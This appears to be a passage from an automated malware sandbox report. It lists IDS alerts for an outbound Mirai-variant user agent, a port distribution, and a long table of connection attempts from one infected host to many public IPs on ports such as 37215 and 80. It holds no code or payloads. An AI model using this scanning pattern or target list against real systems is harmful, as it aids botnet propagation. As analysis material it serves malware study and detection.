192.168.2.1595.163.217.7343390802839471 02/14/24-09:30:19.421156	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	43390	80	192.168.2.15	95.163.217.73
192.168.2.1595.214.134.4852658802839471 02/14/24-09:29:24.833034	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	52658	80	192.168.2.15	95.214.134.48
192.168.2.1595.153.45.13652326802839471 02/14/24-09:30:14.754813	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	52326	80	192.168.2.15	95.153.45.136
192.168.2.1595.101.188.3035808802839471 02/14/24-09:29:56.736509	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	35808	80	192.168.2.15	95.101.188.30
192.168.2.1595.158.24.6460290802839471 02/14/24-09:30:19.417837	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	60290	80	192.168.2.15	95.158.24.64
192.168.2.15112.221.133.9153166802839471 02/14/24-09:29:29.476153	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	53166	80	192.168.2.15	112.221.133.91
192.168.2.1595.170.92.2049376802839471 02/14/24-09:30:09.848136	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	49376	80	192.168.2.15	95.170.92.20
192.168.2.15112.186.69.7241012802839471 02/14/24-09:30:59.252865	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	41012	80	192.168.2.15	112.186.69.72
192.168.2.15112.29.170.23946436802839471 02/14/24-09:29:06.146720	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	46436	80	192.168.2.15	112.29.170.239
192.168.2.1595.170.66.22239634802839471 02/14/24-09:30:41.244571	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	39634	80	192.168.2.15	95.170.66.222
192.168.2.15112.198.55.12144878802839471 02/14/24-09:29:29.505273	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	44878	80	192.168.2.15	112.198.55.121
192.168.2.1588.221.47.14555876802839471 02/14/24-09:29:33.666096	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	55876	80	192.168.2.15	88.221.47.145
192.168.2.1595.56.127.17951830802839471 02/14/24-09:29:19.093571	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	51830	80	192.168.2.15	95.56.127.179
192.168.2.1595.217.145.16549690802839471 02/14/24-09:29:47.818025	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	49690	80	192.168.2.15	95.217.145.165
192.168.2.1595.101.247.12743780802839471 02/14/24-09:29:51.437945	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	43780	80	192.168.2.15	95.101.247.127
192.168.2.15112.13.121.10151690802839471 02/14/24-09:30:04.630815	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	51690	80	192.168.2.15	112.13.121.101
192.168.2.1595.169.188.1737016802839471 02/14/24-09:31:13.059075	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	37016	80	192.168.2.15	95.169.188.17
192.168.2.1595.101.203.25038158802839471 02/14/24-09:30:09.850044	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	38158	80	192.168.2.15	95.101.203.250
192.168.2.1595.179.146.20359722802839471 02/14/24-09:30:44.413481	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	59722	80	192.168.2.15	95.179.146.203
192.168.2.1588.63.12.22350630802839471 02/14/24-09:30:00.971656	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	50630	80	192.168.2.15	88.63.12.223
192.168.2.1595.100.75.21356082802839471 02/14/24-09:30:31.540515	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	56082	80	192.168.2.15	95.100.75.213
192.168.2.15112.166.250.545294802839471 02/14/24-09:29:03.354973	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	45294	80	192.168.2.15	112.166.250.5
192.168.2.1588.218.158.21359262802839471 02/14/24-09:29:33.661619	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	59262	80	192.168.2.15	88.218.158.213
192.168.2.15112.186.20.3860010802839471 02/14/24-09:31:05.727048	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	60010	80	192.168.2.15	112.186.20.38
192.168.2.1595.101.220.17246160802839471 02/14/24-09:31:06.716395	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	46160	80	192.168.2.15	95.101.220.172
192.168.2.1588.99.64.8642730802839471 02/14/24-09:29:51.033750	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	42730	80	192.168.2.15	88.99.64.86
192.168.2.1595.163.53.16254374802839471 02/14/24-09:30:37.211438	TCP	2839471	ETPRO TROJAN Mirai Variant User-Agent (Outbound)	54374	80	192.168.2.15	95.163.53.162

Network Port Distribution

Total Packets: 9447
• 37215 undefined
• 8080 undefined
• 2323 undefined
• 1024 undefined
• 80 (HTTP)
• 23 (Telnet)

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 14, 2024 09:28:44.277666092 CET	8096	37215	192.168.2.15	197.255.59.61
Feb 14, 2024 09:28:44.277753115 CET	8096	37215	192.168.2.15	197.155.118.60
Feb 14, 2024 09:28:44.277785063 CET	8096	37215	192.168.2.15	197.140.93.193
Feb 14, 2024 09:28:44.277837038 CET	8096	37215	192.168.2.15	197.94.36.228
Feb 14, 2024 09:28:44.277864933 CET	8096	37215	192.168.2.15	197.240.169.137
Feb 14, 2024 09:28:44.277879953 CET	8096	37215	192.168.2.15	197.156.75.239
Feb 14, 2024 09:28:44.277883053 CET	8096	37215	192.168.2.15	197.232.233.5
Feb 14, 2024 09:28:44.277884960 CET	8096	37215	192.168.2.15	197.244.118.41
Feb 14, 2024 09:28:44.277889013 CET	8096	37215	192.168.2.15	197.27.205.153
Feb 14, 2024 09:28:44.277918100 CET	8096	37215	192.168.2.15	197.23.216.221
Feb 14, 2024 09:28:44.277935028 CET	8096	37215	192.168.2.15	197.117.216.223
Feb 14, 2024 09:28:44.277935028 CET	8096	37215	192.168.2.15	197.9.175.108
Feb 14, 2024 09:28:44.277954102 CET	8096	37215	192.168.2.15	197.11.210.121
Feb 14, 2024 09:28:44.277995110 CET	8096	37215	192.168.2.15	197.190.121.11
Feb 14, 2024 09:28:44.278007984 CET	8096	37215	192.168.2.15	197.123.46.241
Feb 14, 2024 09:28:44.278328896 CET	8096	37215	192.168.2.15	197.146.53.46
Feb 14, 2024 09:28:44.278337955 CET	8096	37215	192.168.2.15	197.245.73.238
Feb 14, 2024 09:28:44.278465033 CET	8096	37215	192.168.2.15	197.54.220.233
Feb 14, 2024 09:28:44.278465033 CET	8096	37215	192.168.2.15	197.224.124.198
Feb 14, 2024 09:28:44.278475046 CET	8096	37215	192.168.2.15	197.247.131.106
Feb 14, 2024 09:28:44.278490067 CET	8096	37215	192.168.2.15	197.51.193.179
Feb 14, 2024 09:28:44.278507948 CET	8096	37215	192.168.2.15	197.185.2.78
Feb 14, 2024 09:28:44.278539896 CET	8096	37215	192.168.2.15	197.39.182.12
Feb 14, 2024 09:28:44.278558969 CET	8096	37215	192.168.2.15	197.86.193.36
Feb 14, 2024 09:28:44.278666973 CET	8096	37215	192.168.2.15	197.100.199.92
Feb 14, 2024 09:28:44.278671026 CET	8096	37215	192.168.2.15	197.242.100.146
Feb 14, 2024 09:28:44.278671026 CET	8096	37215	192.168.2.15	197.240.50.107
Feb 14, 2024 09:28:44.278683901 CET	8096	37215	192.168.2.15	197.253.178.177
Feb 14, 2024 09:28:44.278717995 CET	8096	37215	192.168.2.15	197.163.48.77
Feb 14, 2024 09:28:44.279241085 CET	8096	37215	192.168.2.15	197.200.161.248
Feb 14, 2024 09:28:44.279248953 CET	8096	37215	192.168.2.15	197.30.150.205
Feb 14, 2024 09:28:44.279248953 CET	8096	37215	192.168.2.15	197.145.155.228
Feb 14, 2024 09:28:44.279253006 CET	8096	37215	192.168.2.15	197.181.142.56
Feb 14, 2024 09:28:44.279270887 CET	8096	37215	192.168.2.15	197.66.175.231
Feb 14, 2024 09:28:44.279285908 CET	8096	37215	192.168.2.15	197.40.202.138
Feb 14, 2024 09:28:44.279300928 CET	8096	37215	192.168.2.15	197.254.121.67
Feb 14, 2024 09:28:44.279309988 CET	8096	37215	192.168.2.15	197.7.115.249
Feb 14, 2024 09:28:44.279331923 CET	8096	37215	192.168.2.15	197.17.45.55
Feb 14, 2024 09:28:44.279351950 CET	8096	37215	192.168.2.15	197.158.67.122
Feb 14, 2024 09:28:44.279370070 CET	8096	37215	192.168.2.15	197.26.165.255
Feb 14, 2024 09:28:44.279459000 CET	8096	37215	192.168.2.15	197.44.77.144
Feb 14, 2024 09:28:44.279465914 CET	8096	37215	192.168.2.15	197.245.119.108
Feb 14, 2024 09:28:44.279499054 CET	8096	37215	192.168.2.15	197.19.29.153
Feb 14, 2024 09:28:44.279501915 CET	8096	37215	192.168.2.15	197.120.199.234
Feb 14, 2024 09:28:44.279501915 CET	8096	37215	192.168.2.15	197.176.240.216
Feb 14, 2024 09:28:44.279524088 CET	8096	37215	192.168.2.15	197.169.171.219
Feb 14, 2024 09:28:44.279557943 CET	8096	37215	192.168.2.15	197.125.83.44
Feb 14, 2024 09:28:44.279892921 CET	8096	37215	192.168.2.15	197.69.237.149
Feb 14, 2024 09:28:44.279911995 CET	8096	37215	192.168.2.15	197.144.171.76
Feb 14, 2024 09:28:44.279917955 CET	8096	37215	192.168.2.15	197.88.59.149
Feb 14, 2024 09:28:44.279917955 CET	8096	37215	192.168.2.15	197.187.160.223
Feb 14, 2024 09:28:44.279944897 CET	8096	37215	192.168.2.15	197.224.181.128
Feb 14, 2024 09:28:44.279957056 CET	8096	37215	192.168.2.15	197.197.16.90
Feb 14, 2024 09:28:44.280024052 CET	8096	37215	192.168.2.15	197.106.185.121
Feb 14, 2024 09:28:44.280059099 CET	8096	37215	192.168.2.15	197.60.34.243
Feb 14, 2024 09:28:44.280066967 CET	8096	37215	192.168.2.15	197.221.153.216
Feb 14, 2024 09:28:44.280076027 CET	8096	37215	192.168.2.15	197.147.173.127
Feb 14, 2024 09:28:44.280093908 CET	8096	37215	192.168.2.15	197.133.105.60
Feb 14, 2024 09:28:44.280114889 CET	8096	37215	192.168.2.15	197.70.64.205
Feb 14, 2024 09:28:44.280138016 CET	8096	37215	192.168.2.15	197.1.0.200
Feb 14, 2024 09:28:44.280152082 CET	8096	37215	192.168.2.15	197.137.42.242
Feb 14, 2024 09:28:44.280230045 CET	8096	37215	192.168.2.15	197.125.27.147
Feb 14, 2024 09:28:44.280235052 CET	8096	37215	192.168.2.15	197.243.121.22
Feb 14, 2024 09:28:44.280260086 CET	8096	37215	192.168.2.15	197.232.205.23
Feb 14, 2024 09:28:44.280278921 CET	8096	37215	192.168.2.15	197.141.69.137
Feb 14, 2024 09:28:44.280301094 CET	8096	37215	192.168.2.15	197.63.198.56
Feb 14, 2024 09:28:44.280344963 CET	8096	37215	192.168.2.15	197.193.247.164
Feb 14, 2024 09:28:44.280642986 CET	8096	37215	192.168.2.15	197.78.62.100
Feb 14, 2024 09:28:44.280658007 CET	8096	37215	192.168.2.15	197.77.83.165
Feb 14, 2024 09:28:44.280683994 CET	8096	37215	192.168.2.15	197.249.105.15
Feb 14, 2024 09:28:44.280708075 CET	8096	37215	192.168.2.15	197.160.52.247
Feb 14, 2024 09:28:44.280780077 CET	8096	37215	192.168.2.15	197.208.36.74
Feb 14, 2024 09:28:44.280798912 CET	8096	37215	192.168.2.15	197.13.250.92
Feb 14, 2024 09:28:44.280808926 CET	8096	37215	192.168.2.15	197.28.150.175
Feb 14, 2024 09:28:44.280811071 CET	8096	37215	192.168.2.15	197.233.104.45
Feb 14, 2024 09:28:44.280834913 CET	8096	37215	192.168.2.15	197.118.214.145
Feb 14, 2024 09:28:44.280848980 CET	8096	37215	192.168.2.15	197.254.174.243
Feb 14, 2024 09:28:44.280873060 CET	8096	37215	192.168.2.15	197.79.154.158
Feb 14, 2024 09:28:44.280898094 CET	8096	37215	192.168.2.15	197.96.236.130
Feb 14, 2024 09:28:44.280989885 CET	8096	37215	192.168.2.15	197.103.0.230
Feb 14, 2024 09:28:44.280994892 CET	8096	37215	192.168.2.15	197.138.74.172
Feb 14, 2024 09:28:44.280994892 CET	8096	37215	192.168.2.15	197.121.79.123
Feb 14, 2024 09:28:44.281019926 CET	8096	37215	192.168.2.15	197.156.165.8
Feb 14, 2024 09:28:44.281060934 CET	8096	37215	192.168.2.15	197.11.115.20
Feb 14, 2024 09:28:44.281060934 CET	8096	37215	192.168.2.15	197.246.105.72
Feb 14, 2024 09:28:44.281266928 CET	8096	37215	192.168.2.15	197.165.131.109
Feb 14, 2024 09:28:44.281305075 CET	8096	37215	192.168.2.15	197.82.220.88
Feb 14, 2024 09:28:44.281328917 CET	8096	37215	192.168.2.15	197.104.203.193
Feb 14, 2024 09:28:44.281351089 CET	8096	37215	192.168.2.15	197.94.33.179
Feb 14, 2024 09:28:44.281393051 CET	8096	37215	192.168.2.15	197.229.206.77
Feb 14, 2024 09:28:44.281416893 CET	8096	37215	192.168.2.15	197.45.123.91
Feb 14, 2024 09:28:44.281428099 CET	8096	37215	192.168.2.15	197.9.96.189
Feb 14, 2024 09:28:44.281457901 CET	8096	37215	192.168.2.15	197.144.49.208
Feb 14, 2024 09:28:44.281476021 CET	8096	37215	192.168.2.15	197.143.32.45
Feb 14, 2024 09:28:44.281502008 CET	8096	37215	192.168.2.15	197.157.175.85
Feb 14, 2024 09:28:44.281517982 CET	8096	37215	192.168.2.15	197.7.198.171
Feb 14, 2024 09:28:44.281907082 CET	8096	37215	192.168.2.15	197.152.64.65
Feb 14, 2024 09:28:44.281930923 CET	8096	37215	192.168.2.15	197.25.116.122
Feb 14, 2024 09:28:44.281948090 CET	8096	37215	192.168.2.15	197.192.185.58
Feb 14, 2024 09:28:44.282026052 CET	8096	37215	192.168.2.15	197.213.112.174
Feb 14, 2024 09:28:44.282027006 CET	8096	37215	192.168.2.15	197.52.221.20
Feb 14, 2024 09:28:44.282028913 CET	8096	37215	192.168.2.15	197.151.58.188
Feb 14, 2024 09:28:44.282028913 CET	8096	37215	192.168.2.15	197.78.83.38
Feb 14, 2024 09:28:44.282052994 CET	8096	37215	192.168.2.15	197.72.124.54
Feb 14, 2024 09:28:44.282069921 CET	8096	37215	192.168.2.15	197.85.67.133
Feb 14, 2024 09:28:44.282099962 CET	8096	37215	192.168.2.15	197.213.107.12
Feb 14, 2024 09:28:44.282118082 CET	8096	37215	192.168.2.15	197.227.224.104
Feb 14, 2024 09:28:44.282159090 CET	8096	37215	192.168.2.15	197.171.250.132
Feb 14, 2024 09:28:44.282197952 CET	8096	37215	192.168.2.15	197.121.73.36
Feb 14, 2024 09:28:44.282215118 CET	8096	37215	192.168.2.15	197.74.18.238
Feb 14, 2024 09:28:44.282241106 CET	8096	37215	192.168.2.15	197.9.143.103
Feb 14, 2024 09:28:44.282258034 CET	8096	37215	192.168.2.15	197.201.205.167
Feb 14, 2024 09:28:44.282283068 CET	8096	37215	192.168.2.15	197.180.112.182
Feb 14, 2024 09:28:44.282294035 CET	8096	37215	192.168.2.15	197.172.27.62
Feb 14, 2024 09:28:44.282309055 CET	8096	37215	192.168.2.15	197.162.3.206
Feb 14, 2024 09:28:44.282335997 CET	8096	37215	192.168.2.15	197.42.181.115
Feb 14, 2024 09:28:44.282360077 CET	8096	37215	192.168.2.15	197.88.141.186
Feb 14, 2024 09:28:44.282382011 CET	8096	37215	192.168.2.15	197.24.172.169
Feb 14, 2024 09:28:44.282411098 CET	8096	37215	192.168.2.15	197.222.52.169
Feb 14, 2024 09:28:44.283473015 CET	8096	37215	192.168.2.15	197.196.2.222
Feb 14, 2024 09:28:44.283488035 CET	8096	37215	192.168.2.15	197.207.75.4
Feb 14, 2024 09:28:44.283514977 CET	8096	37215	192.168.2.15	197.211.123.251
Feb 14, 2024 09:28:44.283593893 CET	8096	37215	192.168.2.15	197.191.186.188
Feb 14, 2024 09:28:44.283595085 CET	8096	37215	192.168.2.15	197.62.202.10
Feb 14, 2024 09:28:44.283598900 CET	8096	37215	192.168.2.15	197.208.141.8
Feb 14, 2024 09:28:44.283598900 CET	8096	37215	192.168.2.15	197.35.182.44
Feb 14, 2024 09:28:44.283607960 CET	8096	37215	192.168.2.15	197.203.120.38
Feb 14, 2024 09:28:44.283642054 CET	8096	37215	192.168.2.15	197.171.90.147
Feb 14, 2024 09:28:44.283654928 CET	8096	37215	192.168.2.15	197.169.155.195
Feb 14, 2024 09:28:44.283678055 CET	8096	37215	192.168.2.15	197.231.238.42
Feb 14, 2024 09:28:44.283694029 CET	8096	37215	192.168.2.15	197.195.207.128
Feb 14, 2024 09:28:44.283782005 CET	8096	37215	192.168.2.15	197.245.137.227
Feb 14, 2024 09:28:44.283783913 CET	8096	37215	192.168.2.15	197.148.159.23
Feb 14, 2024 09:28:44.283786058 CET	8096	37215	192.168.2.15	197.83.58.134
Feb 14, 2024 09:28:44.283790112 CET	8096	37215	192.168.2.15	197.207.68.175
Feb 14, 2024 09:28:44.283799887 CET	8096	37215	192.168.2.15	197.20.133.58
Feb 14, 2024 09:28:44.283828020 CET	8096	37215	192.168.2.15	197.157.110.229
Feb 14, 2024 09:28:44.283828020 CET	8096	37215	192.168.2.15	197.48.185.82
Feb 14, 2024 09:28:44.283828020 CET	8096	37215	192.168.2.15	197.15.89.127
Feb 14, 2024 09:28:44.283833027 CET	8096	37215	192.168.2.15	197.86.77.35
Feb 14, 2024 09:28:44.283857107 CET	8096	37215	192.168.2.15	197.170.193.149
Feb 14, 2024 09:28:44.284492016 CET	8096	37215	192.168.2.15	197.137.10.229
Feb 14, 2024 09:28:44.284540892 CET	8096	37215	192.168.2.15	197.163.254.83
Feb 14, 2024 09:28:44.284591913 CET	8096	37215	192.168.2.15	197.68.211.133
Feb 14, 2024 09:28:44.284594059 CET	8096	37215	192.168.2.15	197.201.221.74
Feb 14, 2024 09:28:44.284596920 CET	8096	37215	192.168.2.15	197.155.193.173
Feb 14, 2024 09:28:44.284604073 CET	8096	37215	192.168.2.15	197.234.105.126
Feb 14, 2024 09:28:44.284609079 CET	8096	37215	192.168.2.15	197.160.204.201
Feb 14, 2024 09:28:44.284626961 CET	8096	37215	192.168.2.15	197.201.213.154
Feb 14, 2024 09:28:44.284645081 CET	8096	37215	192.168.2.15	197.170.41.199
Feb 14, 2024 09:28:44.284665108 CET	8096	37215	192.168.2.15	197.134.171.136
Feb 14, 2024 09:28:44.284687996 CET	8096	37215	192.168.2.15	197.80.217.187
Feb 14, 2024 09:28:44.284708977 CET	8096	37215	192.168.2.15	197.213.166.95
Feb 14, 2024 09:28:44.284794092 CET	8096	37215	192.168.2.15	197.234.223.29
Feb 14, 2024 09:28:44.284795046 CET	8096	37215	192.168.2.15	197.87.105.213
Feb 14, 2024 09:28:44.284801006 CET	8096	37215	192.168.2.15	197.20.170.103
Feb 14, 2024 09:28:44.284801006 CET	8096	37215	192.168.2.15	197.71.127.158
Feb 14, 2024 09:28:44.284801960 CET	8096	37215	192.168.2.15	197.116.253.242
Feb 14, 2024 09:28:44.284831047 CET	8096	37215	192.168.2.15	197.113.182.142
Feb 14, 2024 09:28:44.284842014 CET	8096	37215	192.168.2.15	197.122.65.5
Feb 14, 2024 09:28:44.357547045 CET	7840	80	192.168.2.15	95.247.59.61
Feb 14, 2024 09:28:44.357660055 CET	7840	80	192.168.2.15	95.86.100.228
Feb 14, 2024 09:28:44.357675076 CET	7840	80	192.168.2.15	95.217.52.60
Feb 14, 2024 09:28:44.357692957 CET	7840	80	192.168.2.15	95.196.29.193
Feb 14, 2024 09:28:44.357703924 CET	7840	80	192.168.2.15	95.55.154.221
Feb 14, 2024 09:28:44.357738018 CET	7840	80	192.168.2.15	95.117.6.27
Feb 14, 2024 09:28:44.357750893 CET	7840	80	192.168.2.15	95.27.15.120
Feb 14, 2024 09:28:44.357774973 CET	7840	80	192.168.2.15	95.225.236.161
Feb 14, 2024 09:28:44.357799053 CET	7840	80	192.168.2.15	95.46.242.47
Feb 14, 2024 09:28:44.357837915 CET	7840	80	192.168.2.15	95.79.141.78
Feb 14, 2024 09:28:44.357857943 CET	7840	80	192.168.2.15	95.161.0.160
Feb 14, 2024 09:28:44.357904911 CET	7840	80	192.168.2.15	95.27.94.64
Feb 14, 2024 09:28:44.357911110 CET	7840	80	192.168.2.15	95.144.218.90
Feb 14, 2024 09:28:44.357939005 CET	7840	80	192.168.2.15	95.98.8.154
Feb 14, 2024 09:28:44.357970953 CET	7840	80	192.168.2.15	95.165.194.146
Feb 14, 2024 09:28:44.357980967 CET	7840	80	192.168.2.15	95.11.5.248
Feb 14, 2024 09:28:44.357996941 CET	7840	80	192.168.2.15	95.6.221.149
Feb 14, 2024 09:28:44.358017921 CET	7840	80	192.168.2.15	95.132.124.88
Feb 14, 2024 09:28:44.358033895 CET	7840	80	192.168.2.15	95.109.83.153
Feb 14, 2024 09:28:44.358063936 CET	7840	80	192.168.2.15	95.153.241.225
Feb 14, 2024 09:28:44.358078957 CET	7840	80	192.168.2.15	95.109.181.128
Feb 14, 2024 09:28:44.358100891 CET	7840	80	192.168.2.15	95.219.1.52
Feb 14, 2024 09:28:44.358115911 CET	7840	80	192.168.2.15	95.143.70.173
Feb 14, 2024 09:28:44.358135939 CET	7840	80	192.168.2.15	95.134.7.72
Feb 14, 2024 09:28:44.358150959 CET	7840	80	192.168.2.15	95.23.42.204
Feb 14, 2024 09:28:44.358170986 CET	7840	80	192.168.2.15	95.184.79.248
Feb 14, 2024 09:28:44.358190060 CET	7840	80	192.168.2.15	95.160.149.118
Feb 14, 2024 09:28:44.358227015 CET	7840	80	192.168.2.15	95.224.54.250
Feb 14, 2024 09:28:44.358247995 CET	7840	80	192.168.2.15	95.165.163.150
Feb 14, 2024 09:28:44.358263969 CET	7840	80	192.168.2.15	95.96.237.240
Feb 14, 2024 09:28:44.358293056 CET	7840	80	192.168.2.15	95.135.219.198
Feb 14, 2024 09:28:44.358315945 CET	7840	80	192.168.2.15	95.150.50.123
Feb 14, 2024 09:28:44.358328104 CET	7840	80	192.168.2.15	95.107.184.236
Feb 14, 2024 09:28:44.358366966 CET	7840	80	192.168.2.15	95.21.36.209
Feb 14, 2024 09:28:44.358367920 CET	7840	80	192.168.2.15	95.63.222.28
Feb 14, 2024 09:28:44.358392000 CET	7840	80	192.168.2.15	95.245.156.195
Feb 14, 2024 09:28:44.358402967 CET	7840	80	192.168.2.15	95.254.172.6
Feb 14, 2024 09:28:44.358453035 CET	7840	80	192.168.2.15	95.169.66.81
Feb 14, 2024 09:28:44.358464956 CET	7840	80	192.168.2.15	95.125.112.149
Feb 14, 2024 09:28:44.358464956 CET	7840	80	192.168.2.15	95.75.175.164
Feb 14, 2024 09:28:44.358488083 CET	7840	80	192.168.2.15	95.57.83.180
Feb 14, 2024 09:28:44.358509064 CET	7840	80	192.168.2.15	95.31.192.36
Feb 14, 2024 09:28:44.358534098 CET	7840	80	192.168.2.15	95.246.59.77
Feb 14, 2024 09:28:44.358566999 CET	7840	80	192.168.2.15	95.4.73.83
Feb 14, 2024 09:28:44.358578920 CET	7840	80	192.168.2.15	95.146.42.175
Feb 14, 2024 09:28:44.358599901 CET	7840	80	192.168.2.15	95.43.68.245
Feb 14, 2024 09:28:44.358611107 CET	7840	80	192.168.2.15	95.189.43.244
Feb 14, 2024 09:28:44.358630896 CET	7840	80	192.168.2.15	95.55.151.105
Feb 14, 2024 09:28:44.358654976 CET	7840	80	192.168.2.15	95.196.175.184
Feb 14, 2024 09:28:44.358669043 CET	7840	80	192.168.2.15	95.6.182.11
Feb 14, 2024 09:28:44.358690977 CET	7840	80	192.168.2.15	95.210.194.248
Feb 14, 2024 09:28:44.358721018 CET	7840	80	192.168.2.15	95.247.79.241
Feb 14, 2024 09:28:44.358725071 CET	7840	80	192.168.2.15	95.50.106.121
Feb 14, 2024 09:28:44.358736992 CET	7840	80	192.168.2.15	95.161.138.24
Feb 14, 2024 09:28:44.358756065 CET	7840	80	192.168.2.15	95.112.173.56
Feb 14, 2024 09:28:44.358772039 CET	7840	80	192.168.2.15	95.237.131.80
Feb 14, 2024 09:28:44.358786106 CET	7840	80	192.168.2.15	95.119.62.200
Feb 14, 2024 09:28:44.358799934 CET	7840	80	192.168.2.15	95.220.133.247
Feb 14, 2024 09:28:44.358819962 CET	7840	80	192.168.2.15	95.70.42.95
Feb 14, 2024 09:28:44.358836889 CET	7840	80	192.168.2.15	95.35.110.49
Feb 14, 2024 09:28:44.358859062 CET	7840	80	192.168.2.15	95.148.168.206
Feb 14, 2024 09:28:44.358892918 CET	7840	80	192.168.2.15	95.165.142.194
Feb 14, 2024 09:28:44.358892918 CET	7840	80	192.168.2.15	95.84.207.121
Feb 14, 2024 09:28:44.358922005 CET	7840	80	192.168.2.15	95.128.195.44
Feb 14, 2024 09:28:44.358933926 CET	7840	80	192.168.2.15	95.46.29.133
Feb 14, 2024 09:28:44.358964920 CET	7840	80	192.168.2.15	95.179.138.89
Feb 14, 2024 09:28:44.358994961 CET	7840	80	192.168.2.15	95.173.205.140
Feb 14, 2024 09:28:44.359009027 CET	7840	80	192.168.2.15	95.130.247.63
Feb 14, 2024 09:28:44.359047890 CET	7840	80	192.168.2.15	95.177.218.51
Feb 14, 2024 09:28:44.359050035 CET	7840	80	192.168.2.15	95.222.157.243
Feb 14, 2024 09:28:44.359077930 CET	7840	80	192.168.2.15	95.159.160.141
Feb 14, 2024 09:28:44.359093904 CET	7840	80	192.168.2.15	95.142.252.89
Feb 14, 2024 09:28:44.359106064 CET	7840	80	192.168.2.15	95.212.86.104
Feb 14, 2024 09:28:44.359148026 CET	7840	80	192.168.2.15	95.87.49.194
Feb 14, 2024 09:28:44.359158039 CET	7840	80	192.168.2.15	95.89.149.172
Feb 14, 2024 09:28:44.359179020 CET	7840	80	192.168.2.15	95.138.170.154
Feb 14, 2024 09:28:44.359200954 CET	7840	80	192.168.2.15	95.91.158.236
Feb 14, 2024 09:28:44.359234095 CET	7840	80	192.168.2.15	95.59.36.196
Feb 14, 2024 09:28:44.359251976 CET	7840	80	192.168.2.15	95.151.108.145
Feb 14, 2024 09:28:44.359277964 CET	7840	80	192.168.2.15	95.210.245.191
Feb 14, 2024 09:28:44.359311104 CET	7840	80	192.168.2.15	95.89.174.115
Feb 14, 2024 09:28:44.359325886 CET	7840	80	192.168.2.15	95.234.211.166
Feb 14, 2024 09:28:44.359348059 CET	7840	80	192.168.2.15	95.25.225.218
Feb 14, 2024 09:28:44.359375954 CET	7840	80	192.168.2.15	95.227.52.147
Feb 14, 2024 09:28:44.359546900 CET	7840	80	192.168.2.15	95.14.135.187
Feb 14, 2024 09:28:44.359570026 CET	7840	80	192.168.2.15	95.102.133.137
Feb 14, 2024 09:28:44.359586000 CET	7840	80	192.168.2.15	95.199.95.98
Feb 14, 2024 09:28:44.359607935 CET	7840	80	192.168.2.15	95.63.176.147
Feb 14, 2024 09:28:44.359625101 CET	7840	80	192.168.2.15	95.227.137.156
Feb 14, 2024 09:28:44.359643936 CET	7840	80	192.168.2.15	95.51.232.169
Feb 14, 2024 09:28:44.359667063 CET	7840	80	192.168.2.15	95.44.84.240
Feb 14, 2024 09:28:44.359687090 CET	7840	80	192.168.2.15	95.70.205.46
Feb 14, 2024 09:28:44.359710932 CET	7840	80	192.168.2.15	95.216.123.234
Feb 14, 2024 09:28:44.359730959 CET	7840	80	192.168.2.15	95.47.22.238
Feb 14, 2024 09:28:44.359786987 CET	7840	80	192.168.2.15	95.103.48.190
Feb 14, 2024 09:28:44.359797001 CET	7840	80	192.168.2.15	95.140.228.105
Feb 14, 2024 09:28:44.359827995 CET	7840	80	192.168.2.15	95.72.66.126
Feb 14, 2024 09:28:44.359834909 CET	7840	80	192.168.2.15	95.69.128.53
Feb 14, 2024 09:28:44.359847069 CET	7840	80	192.168.2.15	95.235.233.234
Feb 14, 2024 09:28:44.359899044 CET	7840	80	192.168.2.15	95.103.205.136
Feb 14, 2024 09:28:44.359904051 CET	7840	80	192.168.2.15	95.111.55.89
Feb 14, 2024 09:28:44.359934092 CET	7840	80	192.168.2.15	95.199.9.150
Feb 14, 2024 09:28:44.359972000 CET	7840	80	192.168.2.15	95.202.236.104
Feb 14, 2024 09:28:44.359975100 CET	7840	80	192.168.2.15	95.219.253.212
Feb 14, 2024 09:28:44.359992981 CET	7840	80	192.168.2.15	95.184.101.126
Feb 14, 2024 09:28:44.360021114 CET	7840	80	192.168.2.15	95.124.255.29
Feb 14, 2024 09:28:44.360039949 CET	7840	80	192.168.2.15	95.174.152.255
Feb 14, 2024 09:28:44.360060930 CET	7840	80	192.168.2.15	95.61.242.14
Feb 14, 2024 09:28:44.360085964 CET	7840	80	192.168.2.15	95.159.33.72
Feb 14, 2024 09:28:44.360110044 CET	7840	80	192.168.2.15	95.138.126.138
Feb 14, 2024 09:28:44.360142946 CET	7840	80	192.168.2.15	95.153.100.240
Feb 14, 2024 09:28:44.360162020 CET	7840	80	192.168.2.15	95.68.72.242
Feb 14, 2024 09:28:44.360163927 CET	7840	80	192.168.2.15	95.52.123.110
Feb 14, 2024 09:28:44.360176086 CET	7840	80	192.168.2.15	95.221.87.35
Feb 14, 2024 09:28:44.360202074 CET	7840	80	192.168.2.15	95.244.240.48
Feb 14, 2024 09:28:44.360218048 CET	7840	80	192.168.2.15	95.25.33.224
Feb 14, 2024 09:28:44.360239029 CET	7840	80	192.168.2.15	95.183.173.207
